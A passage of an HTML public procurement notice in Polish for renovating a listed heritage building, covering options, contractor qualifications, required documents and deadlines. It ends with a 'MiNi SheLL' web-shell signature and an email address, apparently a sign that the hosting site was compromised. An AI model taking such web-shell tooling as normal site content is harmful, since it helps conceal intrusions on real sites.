Wykonywanie pokryć dachowych</p> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45261320-3 - Kładzenie rynien</p> <p class="mb-0">45262510-9 - Roboty kamieniarskie</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45232400-6 - Roboty budowlane w zakresie kanałów ściekowych</p> <p class="mb-0">45312311-0 - Montaż instalacji piorunochronnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. W ramach zamówienia Zamawiający, uprawniony jest do skorzystania z prawa opcji na zasadach <br/>i trybie opisanym poniżej:<br/><br/>- Opcja nr 1 – remont dachu papowego w zakres, którego wejdą następujące roboty (zakres zgodny <br/>z przedmiarem robót dla opcji nr 1):<br/>- rozbiórka pokrycia dachu - fragment pokryty papą,<br/>- wymiana elementów więźby dachowej (bez deskowania i łacenia),<br/>- impregnacja elementów więźby przed biokorozją,<br/>- zabezpieczenie preparatem p.poż. dachu - montaż odcinków rur spustowych z blachy ocynkowanej,<br/>- deskowanie powierzchni dachu, krycie papą termozgrzewalną obróbki blacharskie,<br/>- wywóz i utylizacja materiałów demontażowych,<br/>- montaż rusztowań,<br/><br/>- Opcja nr 2 – wymiana pozostałej stolarki okiennej nieujętej w zakresie podstawowym (zakres zgodny z przedmiarem robót dla opcji nr 2):<br/>- wymiana stolarki okiennej<br/>- renowacja stolarki okiennej<br/>- wymiana i renowacja stolarki okiennej - wywóz materiałów.<br/><br/>- Opcja nr 3 – wymiana stolarki drzwiowej nieujętej w zakresie podstawowym (zakres zgodny z przedmiarem robót dla opcji nr 3)<br/><br/>Wykonanie prac, o których wyżej mowa nastąpi na warunkach cenowych wskazanych przez Wykonawcę <br/>w Formularzu Oferty.<br/>Zamawiający może skorzystać z prawa opcji w przypadku dysponowania środkami na sfinansowanie prawa opcji, uruchomienie prawa opcji nastąpi poprzez złożenie w tym zakresie przez Zamawiającego oświadczenia (w wymaganej formie pisemnej), zastrzega się, iż prawo opcji (zakres opcjonalny zamówienia) nie stanowi zobowiązania umownego (w tym finansowego) zaciąganego w momencie zawarcia umowy, a przewidywany zakres opcjonalny zamówienia nie jest gwarantowany do realizacji (Zamawiający może, ale nie musi skorzystać z prawa opcji). <br/><br/><br/>2. Wartość szacunkowa opcji (netto):<br/>- opcja nr 1: 539495,00 PLN<br/>- opcja nr 2: 1891919,14 PLN<br/>- opcja nr 3: 61096,96 PLN <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">13 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielanie zamówień, o których mowa w art. 214 ust. 1 pkt 7 Pzp<br/>Informacja o przewidywanych zamówieniach: podobnych robót budowlanych (dot. zakresu podstawowego oraz zakresu uwzględniającego opcje)- ujętych w Rozdziale IV (Szczegółowy opis przedmiotu zamówienia) SWZ, których potrzeba wyniknęła na etapie realizacji robót budowlanych lub eksploatacji obiektu. <br/><br/>Kod CPV: <br/>45000000-7 - Roboty budowlane,<br/>45262100-2 - Roboty przy wznoszeniu rusztowań,<br/>45111300-1 - Roboty rozbiórkowe,<br/>45100000-8 - Przygotowanie terenu pod budowę,<br/>45320000-6 - Roboty izolacyjne,<br/>45262500-6 - Roboty murarskie i murowe,<br/>45262300-4 – Betonowanie,<br/>45261210-9 - Wykonywanie pokryć dachowych,<br/>45421100-5 - Instalowanie drzwi i okien, i podobnych elementów,<br/>45421000-4 - Roboty w zakresie stolarki budowlanej,<br/>45453000-7 - Roboty remontowe i renowacyjne,<br/>45410000-4 – Tynkowanie,<br/>45261320-3 - Kładzenie rynien,<br/>45262510-9 - Roboty kamieniarskie,<br/>45233000-9 -Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg,<br/>45232400-6 - Roboty budowlane w zakresie kanałów ściekowych,<br/>45312311-0 - Montaż instalacji piorunochronnej.<br/><br/>a)	Okoliczności, po których zaistnieniu będą udzielane zamówienia – zamówienie może zostać udzielone na etapie realizacji robót budowlanych lub eksploatacji obiektu , gdy powtórzenie podobnego zakresu robót budowlanych objętego przedmiotem umowy (dot. zakresu podstawowego oraz zakresu uwzględniającego opcje) wpływa na poprawę bezpieczeństwa lub walorów użytkowania obiektu lub wynika z aktualnych potrzeb Użytkownika.<br/><br/>Podstawą wszczęcia procedury udzielenia zamówienia w oparciu o art. 214 ust. 1 pkt 7 Pzp, polegającego na powtórzeniu podobnych robót budowlanych jak w zamówieniu podstawowym w okresie 3 lat od daty udzielenia zamówienia podstawowego na podstawie odrębnej umowy będzie:<br/>a)	w trakcie realizacji robót objętych niniejszą umową <br/>- dostarczony Zamawiającemu i zatwierdzony przez Zamawiającego protokół konieczności pod-pisany przez kierownika budowy, Inspektora Nadzoru Inwestorskiego,<br/>- przedmiar robót uzgodniony między Wykonawcą a Inspektorem Nadzoru Inwestorskiego i zatwierdzony przez Inspektora Nadzoru Inwestorskiego,<br/>- kosztorys inwestorski opracowany przez Nadzór Inwestorski na podstawie ww. przedmiaru ro-bót,<br/>b)	po dokonaniu odbioru końcowego przedmiotu umowy<br/>- przesłanie przez Zamawiającego Wykonawcy zaproszenia do złożenia oferty z określonym zakresem robót do wykonania.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybiera ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki udziału w postępowaniu:<br/>1)	zdolności technicznej lub zawodowej.<br/><br/><br/>A)	Na potwierdzenie spełnienia warunku zdolności technicznej i zawodowej Wykonawca jest zobowiązany wykazać się:<br/><br/>- Nie mniej niż jedną wykonaną robotą budowlaną w okresie ostatnich pięciu lat przed upływem terminu składania ofert, w ramach której wykonano roboty budowlane polegające na modernizacji lub przebudowie lub remoncie obiektu kubaturowego wpisanego do rejestru zabytków w rozumieniu Ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami o wartości co najmniej 2 000 000,00 zł (dwa miliony złotych) brutto <br/><br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, spełnianie warunku dotyczącego zdolności technicznej i zawodowej dotyczącego wykonanej roboty budowlanej, Wykonawcy wykazują łącznie - Zamawiający nie formułuje w tym zakresie szczególnego sposobu spełnienia warunku o którym mowa w art. 117 ust. 1 Pzp.<br/><br/>B) dysponowaniem co najmniej niżej wymienionymi osobami skierowanymi przez Wykonawcę do realizacji zamówienia publicznego. Zamawiający wymaga, aby osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadały następujące kwalifikacje zawodowe, doświadczenie i wykształcenie oraz zakres wykonywanych czynności:<br/><br/>- Kierownik budowy – posiadający:<br/>Kwalifikacje zawodowe: uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno – budowlanej bez ograniczeń zgodnie z obowiązującą ustawą Prawo budowlane lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów w zakresie niezbędnym do realizacji przedmiotu zamówienia. <br/>Doświadczenie: co najmniej 5-letnie doświadczenie zawodowe w pełnieniu samodzielnej funkcji technicznej kierownika budowy w zakresie posiadanych uprawnień oraz co najmniej 18 miesięczne doświadczenie dotyczące czynnego udziału w robotach budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do rejestru lub inwentarza muzeum będącego instytucją kultury (zgodnie z art. 37c ustawy o ochronie zabytków i opiece nad zabytkami).<br/><br/>- Kierownik robót w branży sanitarnej – posiadający:<br/>Kwalifikacje zawodowe: uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń <br/>w specjalności instalacyjnej w zakresie w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych (instalacje sanitarne) zgodnie z obowiązującą ustawą Prawo budowlane lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów w zakresie niezbędnym do realizacji przedmiotu zamówienia.<br/><br/>- Kierownik robót w branży elektrycznej i elektroenergetycznej – posiadający: <br/>Kwalifikacje zawodowe: uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń <br/>w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych zgodnie z obowiązującą ustawą Prawo budowlane lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów w zakresie niezbędnym do realizacji przedmiotu zamówienia.<br/><br/>Zamawiający dopuszcza łączenie funkcji określonych powyżej, pod warunkiem wykazania się wymaganiami określonymi odpowiednio dla danej funkcji.<br/><br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, spełnianie warunku dotyczącego zdolności technicznej i zawodowej w zakresie dysponowania osobami skierowanymi przez Wykonawcę do realizacji zamówienia publicznego, Wykonawcy mogą wykazać łącznie - Zamawiający nie formułuje w tym zakresie szczególnego sposobu spełnienia warunku o którym mowa w art. 117 ust. 1 Pzp.<br/><br/>Uwagi dotyczące warunków udziału w postępowaniu: <br/>•	Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywa-nych wspólnie z innymi Wykonawcami, należy wykazać robotę budowlaną (zakres), w której wy-konaniu Wykonawca ten bezpośrednio uczestniczył. <br/>•	W przypadku, o którym mowa w art. 117 ust. 3 Pzp, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są dołączyć do oferty oświadczenie, o którym mowa w art. 117 ust. 4 Pzp („(…) z którego wynika, które roboty wykonają poszczególni Wykonawcy.”), stanowiące Załącznik nr 4a do SWZ.<br/>•	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą legitymować się doświadczeniem tylko tych członków konsorcjum, którzy będą realizowali zamówienie.<br/>•	W przypadku, gdy Wykonawca polega na zasobach innych podmiotów przy wykazaniu spełniania warunku zdolności technicznej zobowiązany jest wykazać udział tych podmiotów w wykonaniu zamówienia.<br/>Podmioty udostępniające zasoby<br/>1. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu lub kryteriów selekcji, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji ekonomicznej lub finansowej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>2. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z wnioskiem o dopuszczenie do udziału w postępowaniu albo odpowiednio wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>3. Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w punkcie wyżej niniejszego Rozdziału, potwierdza, że stosunek łączący Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>1) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>2) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane, których wskazane zdolności dotyczą.<br/>4. Zamawiający ocenia, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby zdolności techniczne lub zawodowe lub ich sytuacja ekonomiczna lub finansowa pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu, o których mowa w art. 112 ust. 2 pkt 3 i 4 Pzp, oraz, jeżeli to dotyczy, kryteriów selekcji, a także bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, które zostały przewidziane względem Wykonawcy.<br/> 5. Zgodnie z art. 123 Pzp Wykonawca nie może po upływie terminu składania ofert, powoływać się na zdolności lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga złożenia podmiotowych środków dowodowych w tym zakresie</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień ich złożenia, następujących środków dowodowych:<br/>W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu, o których mowa w Rozdziale XXI SWZ, Zamawiający żąda następujących podmiotowych środków dowodowych:<br/>1)	wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich pięciu lat, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów- inne odpowiednie dokumenty(zgodnie z Załącznikiem Nr 6 do SWZ)<br/><br/>Ww. dokumenty i oświadczenia składa Wykonawca. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia i dokumenty składa każdy z Wykonawców w zakresie, w jakim dotyczy.<br/><br/>2 ) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego w szczególności odpowiedzialnych za świadczenie usług lub kontrolę jakości lub kierowania robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (zgodnie z Załącznikiem Nr 7 do SWZ)<br/><br/>Ww. dokumenty i oświadczenia składa Wykonawca. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia i dokumenty składa każdy z Wykonawców w zakresie, w jakim dotyczy.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty należy dołączyć:<br/>1. Formularz Oferty zgodnie z Załącznikiem nr 3 do SWZ;<br/>2. Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>3. Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>UWAGA: Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak składana oferta (tj. w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym). Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 §2 ustawy z dnia 14 lutego 1991r. Prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego.<br/>4.Odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru potwierdzającego, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania, jeśli ofertę składa osoba prowadząca działalność gospodarczą lub podmiot jest wpisany do w/w rejestrów.<br/>5.Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania - wzór oświadczenia <br/>o niepodleganiu wykluczeniu stanowi Załącznik nr 4 do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepoleganiu wykluczeniu składa każdy z Wykonawców.<br/>UWAGA: Oświadczenie o niepodleganiu wykluczeniu musi być złożone, pod rygorem nieważności, w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>6.Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu - wzór oświadczenia<br/>o spełnianiu warunków stanowi Załącznik nr 5 do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie składa każdy z Wykonawców w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/> UWAGA: Oświadczenie o spełnianiu warunków musi być złożone, pod rygorem nieważności, formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>7.Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia w przypadku, o którym mowa w art. 117 ust. 4 Pzp, z którego wynika, które usługi wykonają poszczególni Wykonawcy (wzór stanowi Załącznik nr 5a do SWZ) - jeśli dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. W przypadku gdy o udzielenie zamówienia ubiegać się będą Wykonawcy wspólnie, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. W takim przypadku do oferty należy dołączyć:<br/>- pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>UWAGA: Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak składana oferta (t.j. w<br/>formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym). Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa<br/>sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14 lutego 1991 r. Prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej<br/>kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepoleganiu wykluczeniu składa każdy z Wykonawców - wzór oświadczenia o niepodleganiu wykluczeniu stanowi Załącznik nr 4 do SWZ.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o spełnianiu warunków udziału w postępowaniu składa każdy z Wykonawców w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu - wzór oświadczenia o spełnianiu warunków stanowi Załącznik nr 5 do SWZ.<br/>W przypadku, o którym mowa w art. 117 ust. 2 Pzp, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są dołączyć do oferty oświadczenie, o którym mowa w art. 117 ust. 4 Pzp („(…) z którego wynika, które usługi wykonają poszczególni Wykonawcy&#34;- wzór stanowi Załącznik nr 5a do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy, określone zostały w Załączniku nr 1 do SWZ. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy zgodnie z warunkami określonymi w § 15 projektu umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-11 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy przetargowej: https://zabrze.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-11 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-11-09</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. dot. Sekcji VIII pkt. 8.1.)<br/>Przez godzinę składania ofert rozumie się godzinę: 09:00:00<br/>2. Wykonawca zobowiązany jest zrealizować przedmiot zamówienia oraz zgłosić Zamawiającemu zakończenie robót i gotowość do odbioru końcowego w terminie do 13 miesięcy od daty zawarcia umowy. Zamawiający określa realizację dla każdej opcji (nr 1, 2, 3) w terminie do 6 miesięcy od dnia uruchomienia danego zakresu.<br/>3. W ramach zamówienia Zamawiający, uprawniony jest do skorzystania z prawa opcji na zasadach <br/>i trybie opisanym poniżej:<br/><br/>- Opcja nr 1 – remont dachu papowego w zakres, którego wejdą następujące roboty (zakres zgodny <br/>z przedmiarem robót dla opcji nr 1):<br/>- rozbiórka pokrycia dachu - fragment pokryty papą,<br/>- wymiana elementów więźby dachowej (bez deskowania i łacenia),<br/>- impregnacja elementów więźby przed biokorozją,<br/>- zabezpieczenie preparatem p.poż. dachu - montaż odcinków rur spustowych z blachy ocynkowanej,<br/>- deskowanie powierzchni dachu, krycie papą termozgrzewalną obróbki blacharskie,<br/>- wywóz i utylizacja materiałów demontażowych,<br/>- montaż rusztowań,<br/>- Opcja nr 2 – wymiana pozostałej stolarki okiennej nieujętej w zakresie podstawowym (zakres zgodny z przedmiarem robót dla opcji nr 2):<br/>- wymiana stolarki okiennej<br/>- renowacja stolarki okiennej<br/>- wymiana i renowacja stolarki okiennej - wywóz materiałów.<br/>- Opcja nr 3 – wymiana stolarki drzwiowej nieujętej w zakresie podstawowym (zakres zgodny z przedmiarem robót dla opcji nr 3)<br/><br/>Wykonanie prac, o których wyżej mowa nastąpi na warunkach cenowych wskazanych przez Wykonawcę w Formularzu Oferty.<br/>Zamawiający może skorzystać z prawa opcji w przypadku dysponowania środkami na sfinansowanie prawa opcji, uruchomienie prawa opcji nastąpi poprzez złożenie w tym zakresie przez Zamawiającego oświadczenia (w wymaganej formie pisemnej), zastrzega się, iż prawo opcji (zakres opcjonalny zamówienia) nie stanowi zobowiązania umownego (w tym finansowego) zaciąganego w momencie zawarcia umowy, a przewidywany zakres opcjonalny zamówienia nie jest gwarantowany do realizacji (Zamawiający może, ale nie musi skorzystać z prawa opcji). <br/>4. Zadanie jest dofinansowane z Rządowego Programu Odbudowy Zabytków NR Edycja2RPOZ/2023/2716/Polski Ład.<br/>5. O udzielenie zamówienia mogą ubiegać się Wykon., którzy nie podlegają wykluczeniu na podstawie obligatoryjnych przesłanek zawartych w art.108ust.1pkt1-6)ustawy Pzp oraz na podstawie art.7ust.1 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U.z2023r.poz.1497,1859).Do Wykon. podlegającemu wykluczeniu w przypadkach, o których mowa w art.7ust.1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę stosuje się art.7ust.3 ww. ustawy.<br/>6. Zamawiający przeznaczył na realizację zamówienia:<br/>- podstawowego kwotę 3 826 285,98 zł brutto,<br/>- podobnego kwotę 956 571,50 zł brutto,<br/>- opcji nr 1: 663578,85 PLN brutto<br/>- opcji nr 2: 2327060,54 PLN brutto<br/>- opcji nr 3: 75149,26 PLN brutto<br/>- podobnego w zakresie opcji: 766 447,16 PLN<br/><br/>7. Przed zawarciem umowy Wykon. zobowiązany jest do wniesienia zabezpieczenia należytego wykonania umowy na sumę stanowiącą 5% ceny całkowitej podanej w ofercie zobowiązania Zamaw. wynikającego z umowy.<br/><br/>8. Kwota, którą wskazano w sekcji IV pkt 4.1.5. to wartość szacunkowa netto zamówienia podstawowego.<br/>9. Zamawiający wybiera ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w SWZ. Kryterium oceny ofert jest cena.<br/>1)	cena ofertowa – zakres podstawowy: 80 punktów <br/>2)	wartość opcji - cena za zakres objęty prawem opcji (wszystkich opcji zamówienia): 20 punktów

Creat By MiNi SheLL
Email: jattceo@gmail.com